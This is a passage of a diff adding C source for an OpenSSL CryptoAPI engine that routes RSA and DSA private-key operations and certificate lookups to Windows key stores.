+#   define __COMPILE_CAPIENG
+#  endif                        /* CERT_KEY_PROV_INFO_PROP_ID */
+# endif                         /* OPENSSL_NO_CAPIENG */
+#endif                          /* OPENSSL_SYS_WIN32 */
+
+#ifdef __COMPILE_CAPIENG
+
+# undef X509_EXTENSIONS
+# undef X509_CERT_PAIR
+
+/* Definitions which may be missing from earlier version of headers */
+# ifndef CERT_STORE_OPEN_EXISTING_FLAG
+#  define CERT_STORE_OPEN_EXISTING_FLAG                   0x00004000
+# endif
+
+# ifndef CERT_STORE_CREATE_NEW_FLAG
+#  define CERT_STORE_CREATE_NEW_FLAG                      0x00002000
+# endif
+
+# ifndef CERT_SYSTEM_STORE_CURRENT_USER
+#  define CERT_SYSTEM_STORE_CURRENT_USER                  0x00010000
+# endif
+
+# include <openssl/engine.h>
+# include <openssl/pem.h>
+# include <openssl/x509v3.h>
+
+# include "e_capi_err.h"
+# include "e_capi_err.c"
+
+static const char *engine_capi_id = "capi";
+static const char *engine_capi_name = "CryptoAPI ENGINE";
+
+typedef struct CAPI_CTX_st CAPI_CTX;
+typedef struct CAPI_KEY_st CAPI_KEY;
+
+static void capi_addlasterror(void);
+static void capi_adderror(DWORD err);
+
+static void CAPI_trace(CAPI_CTX * ctx, char *format, ...);
+
+static int capi_list_providers(CAPI_CTX * ctx, BIO *out);
+static int capi_list_containers(CAPI_CTX * ctx, BIO *out);
+int capi_list_certs(CAPI_CTX * ctx, BIO *out, char *storename);
+void capi_free_key(CAPI_KEY * key);
+
+static PCCERT_CONTEXT capi_find_cert(CAPI_CTX * ctx, const char *id,
+                                     HCERTSTORE hstore);
+
+CAPI_KEY *capi_find_key(CAPI_CTX * ctx, const char *id);
+
+static EVP_PKEY *capi_load_privkey(ENGINE *eng, const char *key_id,
+                                   UI_METHOD *ui_method, void *callback_data);
+static int capi_rsa_sign(int dtype, const unsigned char *m,
+                         unsigned int m_len, unsigned char *sigret,
+                         unsigned int *siglen, const RSA *rsa);
+static int capi_rsa_priv_enc(int flen, const unsigned char *from,
+                             unsigned char *to, RSA *rsa, int padding);
+static int capi_rsa_priv_dec(int flen, const unsigned char *from,
+                             unsigned char *to, RSA *rsa, int padding);
+static int capi_rsa_free(RSA *rsa);
+
+static DSA_SIG *capi_dsa_do_sign(const unsigned char *digest, int dlen,
+                                 DSA *dsa);
+static int capi_dsa_free(DSA *dsa);
+
+static int capi_load_ssl_client_cert(ENGINE *e, SSL *ssl,
+                                     STACK_OF(X509_NAME) *ca_dn, X509 **pcert,
+                                     EVP_PKEY **pkey, STACK_OF(X509) **pother,
+                                     UI_METHOD *ui_method,
+                                     void *callback_data);
+
+static int cert_select_simple(ENGINE *e, SSL *ssl, STACK_OF(X509) *certs);
+# ifdef OPENSSL_CAPIENG_DIALOG
+static int cert_select_dialog(ENGINE *e, SSL *ssl, STACK_OF(X509) *certs);
+# endif
+
+typedef PCCERT_CONTEXT(WINAPI *CERTDLG) (HCERTSTORE, HWND, LPCWSTR,
+                                         LPCWSTR, DWORD, DWORD, void *);
+typedef HWND(WINAPI *GETCONSWIN) (void);
+
+/*
+ * This structure contains CAPI ENGINE specific data: it contains various
+ * global options and affects how other functions behave.
+ */
+
+# define CAPI_DBG_TRACE  2
+# define CAPI_DBG_ERROR  1
+
+struct CAPI_CTX_st {
+    int debug_level;
+    char *debug_file;
+    /* Parameters to use for container lookup */
+    DWORD keytype;
+    LPSTR cspname;
+    DWORD csptype;
+    /* Certificate store name to use */
+    LPSTR storename;
+    LPSTR ssl_client_store;
+    /* System store flags */
+    DWORD store_flags;
+/* Lookup string meanings in load_private_key */
+/* Substring of subject: uses "storename" */
+# define CAPI_LU_SUBSTR          1
+/* Friendly name: uses storename */
+# define CAPI_LU_FNAME           2
+/* Container name: uses cspname, keytype */
+# define CAPI_LU_CONTNAME        3
+    int lookup_method;
+/* Info to dump with dumpcerts option */
+/* Issuer and serial name strings */
+# define CAPI_DMP_SUMMARY        0x1
+/* Friendly name */
+# define CAPI_DMP_FNAME          0x2
+/* Full X509_print dump */
+# define CAPI_DMP_FULL           0x4
+/* Dump PEM format certificate */
+# define CAPI_DMP_PEM            0x8
+/* Dump pseudo key (if possible) */
+# define CAPI_DMP_PSKEY          0x10
+/* Dump key info (if possible) */
+# define CAPI_DMP_PKEYINFO       0x20
+    DWORD dump_flags;
+    int (*client_cert_select) (ENGINE *e, SSL *ssl, STACK_OF(X509) *certs);
+    CERTDLG certselectdlg;
+    GETCONSWIN getconswindow;
+};
+
+static CAPI_CTX *capi_ctx_new();
+static void capi_ctx_free(CAPI_CTX * ctx);
+static int capi_ctx_set_provname(CAPI_CTX * ctx, LPSTR pname, DWORD type,
+                                 int check);
+static int capi_ctx_set_provname_idx(CAPI_CTX * ctx, int idx);
+
+# define CAPI_CMD_LIST_CERTS             ENGINE_CMD_BASE
+# define CAPI_CMD_LOOKUP_CERT            (ENGINE_CMD_BASE + 1)
+# define CAPI_CMD_DEBUG_LEVEL            (ENGINE_CMD_BASE + 2)
+# define CAPI_CMD_DEBUG_FILE             (ENGINE_CMD_BASE + 3)
+# define CAPI_CMD_KEYTYPE                (ENGINE_CMD_BASE + 4)
+# define CAPI_CMD_LIST_CSPS              (ENGINE_CMD_BASE + 5)
+# define CAPI_CMD_SET_CSP_IDX            (ENGINE_CMD_BASE + 6)
+# define CAPI_CMD_SET_CSP_NAME           (ENGINE_CMD_BASE + 7)
+# define CAPI_CMD_SET_CSP_TYPE           (ENGINE_CMD_BASE + 8)
+# define CAPI_CMD_LIST_CONTAINERS        (ENGINE_CMD_BASE + 9)
+# define CAPI_CMD_LIST_OPTIONS           (ENGINE_CMD_BASE + 10)
+# define CAPI_CMD_LOOKUP_METHOD          (ENGINE_CMD_BASE + 11)
+# define CAPI_CMD_STORE_NAME             (ENGINE_CMD_BASE + 12)
+# define CAPI_CMD_STORE_FLAGS            (ENGINE_CMD_BASE + 13)
+
+static const ENGINE_CMD_DEFN capi_cmd_defns[] = {
+    {CAPI_CMD_LIST_CERTS,
+     "list_certs",
+     "List all certificates in store",
+     ENGINE_CMD_FLAG_NO_INPUT},
+    {CAPI_CMD_LOOKUP_CERT,
+     "lookup_cert",
+     "Lookup and output certificates",
+     ENGINE_CMD_FLAG_STRING},
+    {CAPI_CMD_DEBUG_LEVEL,
+     "debug_level",
+     "debug level (1=errors, 2=trace)",
+     ENGINE_CMD_FLAG_NUMERIC},
+    {CAPI_CMD_DEBUG_FILE,
+     "debug_file",
+     "debugging filename)",
+     ENGINE_CMD_FLAG_STRING},
+    {CAPI_CMD_KEYTYPE,
+     "key_type",
+     "Key type: 1=AT_KEYEXCHANGE (default), 2=AT_SIGNATURE",
+     ENGINE_CMD_FLAG_NUMERIC},
+    {CAPI_CMD_LIST_CSPS,
+     "list_csps",
+     "List all CSPs",
+     ENGINE_CMD_FLAG_NO_INPUT},
+    {CAPI_CMD_SET_CSP_IDX,
+     "csp_idx",
+     "Set CSP by index",
+     ENGINE_CMD_FLAG_NUMERIC},
+    {CAPI_CMD_SET_CSP_NAME,
+     "csp_name",
+     "Set CSP name, (default CSP used if not specified)",
+     ENGINE_CMD_FLAG_STRING},
+    {CAPI_CMD_SET_CSP_TYPE,
+     "csp_type",
+     "Set CSP type, (default RSA_PROV_FULL)",
+     ENGINE_CMD_FLAG_NUMERIC},
+    {CAPI_CMD_LIST_CONTAINERS,
+     "list_containers",
+     "list container names",
+     ENGINE_CMD_FLAG_NO_INPUT},
+    {CAPI_CMD_LIST_OPTIONS,
+     "list_options",
+     "Set list options (1=summary,2=friendly name, 4=full printout, 8=PEM output, 16=XXX, "
+     "32=private key info)",
+     ENGINE_CMD_FLAG_NUMERIC},
+    {CAPI_CMD_LOOKUP_METHOD,
+     "lookup_method",
+     "Set key lookup method (1=substring, 2=friendlyname, 3=container name)",
+     ENGINE_CMD_FLAG_NUMERIC},
+    {CAPI_CMD_STORE_NAME,
+     "store_name",
+     "certificate store name, default \"MY\"",
+     ENGINE_CMD_FLAG_STRING},
+    {CAPI_CMD_STORE_FLAGS,
+     "store_flags",
+     "Certificate store flags: 1 = system store",
+     ENGINE_CMD_FLAG_NUMERIC},
+
+    {0, NULL, NULL, 0}
+};
+
+static int capi_idx = -1;
+static int rsa_capi_idx = -1;
+static int dsa_capi_idx = -1;
+static int cert_capi_idx = -1;
+
+static int capi_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) (void))
+{
+    int ret = 1;
+    CAPI_CTX *ctx;
+    BIO *out;
+    if (capi_idx == -1) {
+        CAPIerr(CAPI_F_CAPI_CTRL, CAPI_R_ENGINE_NOT_INITIALIZED);
+        return 0;
+    }
+    ctx = ENGINE_get_ex_data(e, capi_idx);
+    out = BIO_new_fp(stdout, BIO_NOCLOSE);
+    switch (cmd) {
+    case CAPI_CMD_LIST_CSPS:
+        ret = capi_list_providers(ctx, out);
+        break;
+
+    case CAPI_CMD_LIST_CERTS:
+        ret = capi_list_certs(ctx, out, NULL);
+        break;
+
+    case CAPI_CMD_LOOKUP_CERT:
+        ret = capi_list_certs(ctx, out, p);
+        break;
+
+    case CAPI_CMD_LIST_CONTAINERS:
+        ret = capi_list_containers(ctx, out);
+        break;
+
+    case CAPI_CMD_STORE_NAME:
+        if (ctx->storename)
+            OPENSSL_free(ctx->storename);
+        ctx->storename = BUF_strdup(p);
+        CAPI_trace(ctx, "Setting store name to %s\n", p);
+        break;
+
+    case CAPI_CMD_STORE_FLAGS:
+        if (i & 1) {
+            ctx->store_flags |= CERT_SYSTEM_STORE_LOCAL_MACHINE;
+            ctx->store_flags &= ~CERT_SYSTEM_STORE_CURRENT_USER;
+        } else {
+            ctx->store_flags |= CERT_SYSTEM_STORE_CURRENT_USER;
+            ctx->store_flags &= ~CERT_SYSTEM_STORE_LOCAL_MACHINE;
+        }
+        CAPI_trace(ctx, "Setting flags to %d\n", i);
+        break;
+
+    case CAPI_CMD_DEBUG_LEVEL:
+        ctx->debug_level = (int)i;
+        CAPI_trace(ctx, "Setting debug level to %d\n", ctx->debug_level);
+        break;
+
+    case CAPI_CMD_DEBUG_FILE:
+        ctx->debug_file = BUF_strdup(p);
+        CAPI_trace(ctx, "Setting debug file to %s\n", ctx->debug_file);
+        break;
+
+    case CAPI_CMD_KEYTYPE:
+        ctx->keytype = i;
+        CAPI_trace(ctx, "Setting key type to %d\n", ctx->keytype);
+        break;
+
+    case CAPI_CMD_SET_CSP_IDX:
+        ret = capi_ctx_set_provname_idx(ctx, i);
+        break;
+
+    case CAPI_CMD_LIST_OPTIONS:
+        ctx->dump_flags = i;
+        break;
+
+    case CAPI_CMD_LOOKUP_METHOD:
+        if (i < 1 || i > 3) {
+            CAPIerr(CAPI_F_CAPI_CTRL, CAPI_R_INVALID_LOOKUP_METHOD);
+            return 0;
+        }
+        ctx->lookup_method = i;
+        break;
+
+    case CAPI_CMD_SET_CSP_NAME:
+        ret = capi_ctx_set_provname(ctx, p, ctx->csptype, 1);
+        break;
+
+    case CAPI_CMD_SET_CSP_TYPE:
+        ctx->csptype = i;
+        break;
+
+    default:
+        CAPIerr(CAPI_F_CAPI_CTRL, CAPI_R_UNKNOWN_COMMAND);
+        ret = 0;
+    }
+
+    BIO_free(out);
+    return ret;
+
+}
+
+static RSA_METHOD capi_rsa_method = {
+    "CryptoAPI RSA method",
+    0,                          /* pub_enc */
+    0,                          /* pub_dec */
+    capi_rsa_priv_enc,          /* priv_enc */
+    capi_rsa_priv_dec,          /* priv_dec */
+    0,                          /* rsa_mod_exp */
+    0,                          /* bn_mod_exp */
+    0,                          /* init */
+    capi_rsa_free,              /* finish */
+    RSA_FLAG_SIGN_VER,          /* flags */
+    NULL,                       /* app_data */
+    capi_rsa_sign,              /* rsa_sign */
+    0                           /* rsa_verify */
+};
+
+static DSA_METHOD capi_dsa_method = {
+    "CryptoAPI DSA method",
+    capi_dsa_do_sign,           /* dsa_do_sign */
+    0,                          /* dsa_sign_setup */
+    0,                          /* dsa_do_verify */
+    0,                          /* dsa_mod_exp */
+    0,                          /* bn_mod_exp */
+    0,                          /* init */
+    capi_dsa_free,              /* finish */
+    0,                          /* flags */
+    NULL,                       /* app_data */
+    0,                          /* dsa_paramgen */
+    0                           /* dsa_keygen */
+};
+
+static int capi_init(ENGINE *e)
+{
+    CAPI_CTX *ctx;
+    const RSA_METHOD *ossl_rsa_meth;
+    const DSA_METHOD *ossl_dsa_meth;
+
+    if (capi_idx < 0) {
+        capi_idx = ENGINE_get_ex_new_index(0, NULL, NULL, NULL, 0);
+        if (capi_idx < 0)
+            goto memerr;
+
+        cert_capi_idx = X509_get_ex_new_index(0, NULL, NULL, NULL, 0);
+
+        /* Setup RSA_METHOD */
+        rsa_capi_idx = RSA_get_ex_new_index(0, NULL, NULL, NULL, 0);
+        ossl_rsa_meth = RSA_PKCS1_SSLeay();
+        capi_rsa_method.rsa_pub_enc = ossl_rsa_meth->rsa_pub_enc;
+        capi_rsa_method.rsa_pub_dec = ossl_rsa_meth->rsa_pub_dec;
+        capi_rsa_method.rsa_mod_exp = ossl_rsa_meth->rsa_mod_exp;
+        capi_rsa_method.bn_mod_exp = ossl_rsa_meth->bn_mod_exp;
+
+        /* Setup DSA Method */
+        dsa_capi_idx = DSA_get_ex_new_index(0, NULL, NULL, NULL, 0);
+        ossl_dsa_meth = DSA_OpenSSL();
+        capi_dsa_method.dsa_do_verify = ossl_dsa_meth->dsa_do_verify;
+        capi_dsa_method.dsa_mod_exp = ossl_dsa_meth->dsa_mod_exp;
+        capi_dsa_method.bn_mod_exp = ossl_dsa_meth->bn_mod_exp;
+    }
+
+    ctx = capi_ctx_new();
+    if (!ctx)
+        goto memerr;
+
+    ENGINE_set_ex_data(e, capi_idx, ctx);
+
+# ifdef OPENSSL_CAPIENG_DIALOG
+    {
+        HMODULE cryptui = LoadLibrary(TEXT("CRYPTUI.DLL"));
+        HMODULE kernel = GetModuleHandle(TEXT("KERNEL32.DLL"));
+        if (cryptui)
+            ctx->certselectdlg =
+                (CERTDLG) GetProcAddress(cryptui,
+                                         "CryptUIDlgSelectCertificateFromStore");
+        if (kernel)
+            ctx->getconswindow =
+                (GETCONSWIN) GetProcAddress(kernel, "GetConsoleWindow");
+        if (cryptui && !OPENSSL_isservice())
+            ctx->client_cert_select = cert_select_dialog;
+    }
+# endif
+
+    return 1;
+
+ memerr:
+    CAPIerr(CAPI_F_CAPI_INIT, ERR_R_MALLOC_FAILURE);
+    return 0;
+
+    return 1;
+}
+
+static int capi_destroy(ENGINE *e)
+{
+    ERR_unload_CAPI_strings();
+    return 1;
+}
+
+static int capi_finish(ENGINE *e)
+{
+    CAPI_CTX *ctx;
+    ctx = ENGINE_get_ex_data(e, capi_idx);
+    capi_ctx_free(ctx);
+    ENGINE_set_ex_data(e, capi_idx, NULL);
+    return 1;
+}
+
+/*
+ * CryptoAPI key application data. This contains a handle to the private key
+ * container (for sign operations) and a handle to the key (for decrypt
+ * operations).
+ */
+
+struct CAPI_KEY_st {
+    /* Associated certificate context (if any) */
+    PCCERT_CONTEXT pcert;
+    HCRYPTPROV hprov;
+    HCRYPTKEY key;
+    DWORD keyspec;
+};
+
+static int bind_capi(ENGINE *e)
+{
+    if (!ENGINE_set_id(e, engine_capi_id)
+        || !ENGINE_set_name(e, engine_capi_name)
+        || !ENGINE_set_flags(e, ENGINE_FLAGS_NO_REGISTER_ALL)
+        || !ENGINE_set_init_function(e, capi_init)
+        || !ENGINE_set_finish_function(e, capi_finish)
+        || !ENGINE_set_destroy_function(e, capi_destroy)
+        || !ENGINE_set_RSA(e, &capi_rsa_method)
+        || !ENGINE_set_DSA(e, &capi_dsa_method)
+        || !ENGINE_set_load_privkey_function(e, capi_load_privkey)
+        || !ENGINE_set_load_ssl_client_cert_function(e,
+                                                     capi_load_ssl_client_cert)
+        || !ENGINE_set_cmd_defns(e, capi_cmd_defns)
+        || !ENGINE_set_ctrl_function(e, capi_ctrl))
+        return 0;
+    ERR_load_CAPI_strings();
+
+    return 1;
+
+}
+
+# ifndef OPENSSL_NO_DYNAMIC_ENGINE
+static int bind_helper(ENGINE *e, const char *id)
+{
+    if (id && (strcmp(id, engine_capi_id) != 0))
+        return 0;
+    if (!bind_capi(e))
+        return 0;
+    return 1;
+}
+
+IMPLEMENT_DYNAMIC_CHECK_FN()
+    IMPLEMENT_DYNAMIC_BIND_FN(bind_helper)
+# else
+static ENGINE *engine_capi(void)
+{
+    ENGINE *ret = ENGINE_new();
+    if (!ret)
+        return NULL;
+    if (!bind_capi(ret)) {
+        ENGINE_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+void ENGINE_load_capi(void)
+{
+    /* Copied from eng_[openssl|dyn].c */
+    ENGINE *toadd = engine_capi();
+    if (!toadd)
+        return;
+    ENGINE_add(toadd);
+    ENGINE_free(toadd);
+    ERR_clear_error();
+}
+# endif
+
+static int lend_tobn(BIGNUM *bn, unsigned char *bin, int binlen)
+{
+    int i;
+    /*
+     * Reverse buffer in place: since this is a keyblob structure that will
+     * be freed up after conversion anyway it doesn't matter if we change
+     * it.
+     */
+    for (i = 0; i < binlen / 2; i++) {
+        unsigned char c;
+        c = bin[i];
+        bin[i] = bin[binlen - i - 1];
+        bin[binlen - i - 1] = c;
+    }
+
+    if (!BN_bin2bn(bin, binlen, bn))
+        return 0;
+    return 1;
+}
+
+/* Given a CAPI_KEY get an EVP_PKEY structure */
+
+static EVP_PKEY *capi_get_pkey(ENGINE *eng, CAPI_KEY * key)
+{
+    unsigned char *pubkey = NULL;
+    DWORD len;
+    BLOBHEADER *bh;
+    RSA *rkey = NULL;
+    DSA *dkey = NULL;
+    EVP_PKEY *ret = NULL;
+    if (!CryptExportKey(key->key, 0, PUBLICKEYBLOB, 0, NULL, &len)) {
+        CAPIerr(CAPI_F_CAPI_GET_PKEY, CAPI_R_PUBKEY_EXPORT_LENGTH_ERROR);
+        capi_addlasterror();
+        return NULL;
+    }
+
+    pubkey = OPENSSL_malloc(len);
+
+    if (!pubkey)
+        goto memerr;
+
+    if (!CryptExportKey(key->key, 0, PUBLICKEYBLOB, 0, pubkey, &len)) {
+        CAPIerr(CAPI_F_CAPI_GET_PKEY, CAPI_R_PUBKEY_EXPORT_ERROR);
+        capi_addlasterror();
+        goto err;
+    }
+
+    bh = (BLOBHEADER *) pubkey;
+    if (bh->bType != PUBLICKEYBLOB) {
+        CAPIerr(CAPI_F_CAPI_GET_PKEY, CAPI_R_INVALID_PUBLIC_KEY_BLOB);
+        goto err;
+    }
+    if (bh->aiKeyAlg == CALG_RSA_SIGN || bh->aiKeyAlg == CALG_RSA_KEYX) {
+        RSAPUBKEY *rp;
+        DWORD rsa_modlen;
+        unsigned char *rsa_modulus;
+        rp = (RSAPUBKEY *) (bh + 1);
+        if (rp->magic != 0x31415352) {
+            char magstr[10];
+            BIO_snprintf(magstr, 10, "%lx", rp->magic);
+            CAPIerr(CAPI_F_CAPI_GET_PKEY,
+                    CAPI_R_INVALID_RSA_PUBLIC_KEY_BLOB_MAGIC_NUMBER);
+            ERR_add_error_data(2, "magic=0x", magstr);
+            goto err;
+        }
+        rsa_modulus = (unsigned char *)(rp + 1);
+        rkey = RSA_new_method(eng);
+        if (!rkey)
+            goto memerr;
+
+        rkey->e = BN_new();
+        rkey->n = BN_new();
+
+        if (!rkey->e || !rkey->n)
+            goto memerr;
+
+        if (!BN_set_word(rkey->e, rp->pubexp))
+            goto memerr;
+
+        rsa_modlen = rp->bitlen / 8;
+        if (!lend_tobn(rkey->n, rsa_modulus, rsa_modlen))
+            goto memerr;
+
+        RSA_set_ex_data(rkey, rsa_capi_idx, key);
+
+        if (!(ret = EVP_PKEY_new()))
+            goto memerr;
+
+        EVP_PKEY_assign_RSA(ret, rkey);
+        rkey = NULL;
+
+    } else if (bh->aiKeyAlg == CALG_DSS_SIGN) {
+        DSSPUBKEY *dp;
+        DWORD dsa_plen;
+        unsigned char *btmp;
+        dp = (DSSPUBKEY *) (bh + 1);
+        if (dp->magic != 0x31535344) {
+            char magstr[10];
+            BIO_snprintf(magstr, 10, "%lx", dp->magic);
+            CAPIerr(CAPI_F_CAPI_GET_PKEY,
+                    CAPI_R_INVALID_DSA_PUBLIC_KEY_BLOB_MAGIC_NUMBER);
+            ERR_add_error_data(2, "magic=0x", magstr);
+            goto err;
+        }
+        dsa_plen = dp->bitlen / 8;
+        btmp = (unsigned char *)(dp + 1);
+        dkey = DSA_new_method(eng);
+        if (!dkey)
+            goto memerr;
+        dkey->p = BN_new();
+        dkey->q = BN_new();
+        dkey->g = BN_new();
+        dkey->pub_key = BN_new();
+        if (!dkey->p || !dkey->q || !dkey->g || !dkey->pub_key)
+            goto memerr;
+        if (!lend_tobn(dkey->p, btmp, dsa_plen))
+            goto memerr;
+        btmp += dsa_plen;
+        if (!lend_tobn(dkey->q, btmp, 20))
+            goto memerr;
+        btmp += 20;
+        if (!lend_tobn(dkey->g, btmp, dsa_plen))
+            goto memerr;
+        btmp += dsa_plen;
+        if (!lend_tobn(dkey->pub_key, btmp, dsa_plen))
+            goto memerr;
+        btmp += dsa_plen;
+
+        DSA_set_ex_data(dkey, dsa_capi_idx, key);
+
+        if (!(ret = EVP_PKEY_new()))
+            goto memerr;
+
+        EVP_PKEY_assign_DSA(ret, dkey);
+        dkey = NULL;
+    } else {
+        char algstr[10];
+        BIO_snprintf(algstr, 10, "%lx", bh->aiKeyAlg);
+        CAPIerr(CAPI_F_CAPI_GET_PKEY,
+                CAPI_R_UNSUPPORTED_PUBLIC_KEY_ALGORITHM);
+        ERR_add_error_data(2, "aiKeyAlg=0x", algstr);
+        goto err;
+    }
+
+ err:
+    if (pubkey)
+        OPENSSL_free(pubkey);
+    if (!ret) {
+        if (rkey)
+            RSA_free(rkey);
+        if (dkey)
+            DSA_free(dkey);
+    }
+
+    return ret;
+
+ memerr:
+    CAPIerr(CAPI_F_CAPI_GET_PKEY, ERR_R_MALLOC_FAILURE);
+    goto err;
+
+}
+
+static EVP_PKEY *capi_load_privkey(ENGINE *eng, const char *key_id,
+                                   UI_METHOD *ui_method, void *callback_data)
+{
+    CAPI_CTX *ctx;
+    CAPI_KEY *key;
+    EVP_PKEY *ret;
+    ctx = ENGINE_get_ex_data(eng, capi_idx);
+
+    if (!ctx) {
+        CAPIerr(CAPI_F_CAPI_LOAD_PRIVKEY, CAPI_R_CANT_FIND_CAPI_CONTEXT);
+        return NULL;
+    }
+
+    key = capi_find_key(ctx, key_id);
+
+    if (!key)
+        return NULL;
+
+    ret = capi_get_pkey(eng, key);
+
+    if (!ret)
+        capi_free_key(key);
+    return ret;
+
+}
+
+/* CryptoAPI RSA operations */
+
+int capi_rsa_priv_enc(int flen, const unsigned char *from,
+                      unsigned char *to, RSA *rsa, int padding)
+{
+    CAPIerr(CAPI_F_CAPI_RSA_PRIV_ENC, CAPI_R_FUNCTION_NOT_SUPPORTED);
+    return -1;
+}
+
+int capi_rsa_sign(int dtype, const unsigned char *m, unsigned int m_len,
+                  unsigned char *sigret, unsigned int *siglen, const RSA *rsa)
+{
+    ALG_ID alg;
+    HCRYPTHASH hash;
+    DWORD slen;
+    unsigned int i;
+    int ret = -1;
+    CAPI_KEY *capi_key;
+    CAPI_CTX *ctx;
+
+    ctx = ENGINE_get_ex_data(rsa->engine, capi_idx);
+
+    CAPI_trace(ctx, "Called CAPI_rsa_sign()\n");
+
+    capi_key = RSA_get_ex_data(rsa, rsa_capi_idx);
+    if (!capi_key) {
+        CAPIerr(CAPI_F_CAPI_RSA_SIGN, CAPI_R_CANT_GET_KEY);
+        return -1;
+    }
+/* Convert the signature type to a CryptoAPI algorithm ID */
+    switch (dtype) {
+    case NID_sha1:
+        alg = CALG_SHA1;
+        break;
+
+    case NID_md5:
+        alg = CALG_MD5;
+        break;
+
+    case NID_md5_sha1:
+        alg = CALG_SSL3_SHAMD5;
+        break;
+    default:
+        {
+            char algstr[10];
+            BIO_snprintf(algstr, 10, "%lx", dtype);
+            CAPIerr(CAPI_F_CAPI_RSA_SIGN, CAPI_R_UNSUPPORTED_ALGORITHM_NID);
+            ERR_add_error_data(2, "NID=0x", algstr);
+            return -1;
+        }
+    }
+
+/* Create the hash object */
+    if (!CryptCreateHash(capi_key->hprov, alg, 0, 0, &hash)) {
+        CAPIerr(CAPI_F_CAPI_RSA_SIGN, CAPI_R_CANT_CREATE_HASH_OBJECT);
+        capi_addlasterror();
+        return -1;
+    }
+/* Set the hash value to the value passed */
+
+    if (!CryptSetHashParam(hash, HP_HASHVAL, (unsigned char *)m, 0)) {
+        CAPIerr(CAPI_F_CAPI_RSA_SIGN, CAPI_R_CANT_SET_HASH_VALUE);
+        capi_addlasterror();
+        goto err;
+    }
+
+/* Finally sign it */
+    slen = RSA_size(rsa);
+    if (!CryptSignHash(hash, capi_key->keyspec, NULL, 0, sigret, &slen)) {
+        CAPIerr(CAPI_F_CAPI_RSA_SIGN, CAPI_R_ERROR_SIGNING_HASH);
+        capi_addlasterror();
+        goto err;
+    } else {
+        ret = 1;
+        /* Inplace byte reversal of signature */
+        for (i = 0; i < slen / 2; i++) {
+            unsigned char c;
+            c = sigret[i];
+            sigret[i] = sigret[slen - i - 1];
+            sigret[slen - i - 1] = c;
+        }
+        *siglen = slen;
+    }
+
+    /* Now cleanup */
+
+ err:
+    CryptDestroyHash(hash);
+
+    return ret;
+}
+
+int capi_rsa_priv_dec(int flen, const unsigned char *from,
+                      unsigned char *to, RSA *rsa, int padding)
+{
+    int i;
+    unsigned char *tmpbuf;
+    CAPI_KEY *capi_key;
+    CAPI_CTX *ctx;
+    ctx = ENGINE_get_ex_data(rsa->engine, capi_idx);
+
+    CAPI_trace(ctx, "Called capi_rsa_priv_dec()\n");
+
+    capi_key = RSA_get_ex_data(rsa, rsa_capi_idx);
+    if (!capi_key) {
+        CAPIerr(CAPI_F_CAPI_RSA_PRIV_DEC, CAPI_R_CANT_GET_KEY);
+        return -1;
+    }
+
+    if (padding != RSA_PKCS1_PADDING) {
+        char errstr[10];
+        BIO_snprintf(errstr, 10, "%d", padding);
+        CAPIerr(CAPI_F_CAPI_RSA_PRIV_DEC, CAPI_R_UNSUPPORTED_PADDING);
+        ERR_add_error_data(2, "padding=", errstr);
+        return -1;
+    }
+
+    /* Create temp reverse order version of input */
+    if (!(tmpbuf = OPENSSL_malloc(flen))) {
+        CAPIerr(CAPI_F_CAPI_RSA_PRIV_DEC, ERR_R_MALLOC_FAILURE);
+        return -1;
+    }
+    for (i = 0; i < flen; i++)
+        tmpbuf[flen - i - 1] = from[i];
+
+    /* Finally decrypt it */
+    if (!CryptDecrypt(capi_key->key, 0, TRUE, 0, tmpbuf, &flen)) {
+        CAPIerr(CAPI_F_CAPI_RSA_PRIV_DEC, CAPI_R_DECRYPT_ERROR);
+        capi_addlasterror();
+        OPENSSL_free(tmpbuf);
+        return -1;
+    } else
+        memcpy(to, tmpbuf, flen);
+
+    OPENSSL_free(tmpbuf);
+
+    return flen;
+}
+
+static int capi_rsa_free(RSA *rsa)
+{
+    CAPI_KEY *capi_key;
+    capi_key = RSA_get_ex_data(rsa, rsa_capi_idx);
+    capi_free_key(capi_key);
+    RSA_set_ex_data(rsa, rsa_capi_idx, 0);
+    return 1;
+}
+
+/* CryptoAPI DSA operations */
+
+static DSA_SIG *capi_dsa_do_sign(const unsigned char *digest, int dlen,
+                                 DSA *dsa)
+{
+    HCRYPTHASH hash;
+    DWORD slen;
+    DSA_SIG *ret = NULL;
+    CAPI_KEY *capi_key;
+    CAPI_CTX *ctx;
+    unsigned char csigbuf[40];
+
+    ctx = ENGINE_get_ex_data(dsa->engine, capi_idx);
+
+    CAPI_trace(ctx, "Called CAPI_dsa_do_sign()\n");
+
+    capi_key = DSA_get_ex_data(dsa, dsa_capi_idx);
+
+    if (!capi_key) {
+        CAPIerr(CAPI_F_CAPI_DSA_DO_SIGN, CAPI_R_CANT_GET_KEY);
+        return NULL;
+    }
+
+    if (dlen != 20) {
+        CAPIerr(CAPI_F_CAPI_DSA_DO_SIGN, CAPI_R_INVALID_DIGEST_LENGTH);
+        return NULL;
+    }
+
+    /* Create the hash object */
+    if (!CryptCreateHash(capi_key->hprov, CALG_SHA1, 0, 0, &hash)) {
+        CAPIerr(CAPI_F_CAPI_DSA_DO_SIGN, CAPI_R_CANT_CREATE_HASH_OBJECT);
+        capi_addlasterror();
+        return NULL;
+    }
+
+    /* Set the hash value to the value passed */
+    if (!CryptSetHashParam(hash, HP_HASHVAL, (unsigned char *)digest, 0)) {
+        CAPIerr(CAPI_F_CAPI_DSA_DO_SIGN, CAPI_R_CANT_SET_HASH_VALUE);
+        capi_addlasterror();
+        goto err;
+    }
+
+    /* Finally sign it */
+    slen = sizeof(csigbuf);
+    if (!CryptSignHash(hash, capi_key->keyspec, NULL, 0, csigbuf, &slen)) {
+        CAPIerr(CAPI_F_CAPI_DSA_DO_SIGN, CAPI_R_ERROR_SIGNING_HASH);
+        capi_addlasterror();
+        goto err;
+    } else {
+        ret = DSA_SIG_new();
+        if (!ret)
+            goto err;
+        ret->r = BN_new();
+        ret->s = BN_new();
+        if (!ret->r || !ret->s)
+            goto err;
+        if (!lend_tobn(ret->r, csigbuf, 20)
+            || !lend_tobn(ret->s, csigbuf + 20, 20)) {
+            DSA_SIG_free(ret);
+            ret = NULL;
+            goto err;
+        }
+    }
+
+    /* Now cleanup */
+
+ err:
+    OPENSSL_cleanse(csigbuf, 40);
+    CryptDestroyHash(hash);
+    return ret;
+}
+
+static int capi_dsa_free(DSA *dsa)
+{
+    CAPI_KEY *capi_key;
+    capi_key = DSA_get_ex_data(dsa, dsa_capi_idx);
+    capi_free_key(capi_key);
+    DSA_set_ex_data(dsa, dsa_capi_idx, 0);
+    return 1;
+}
+
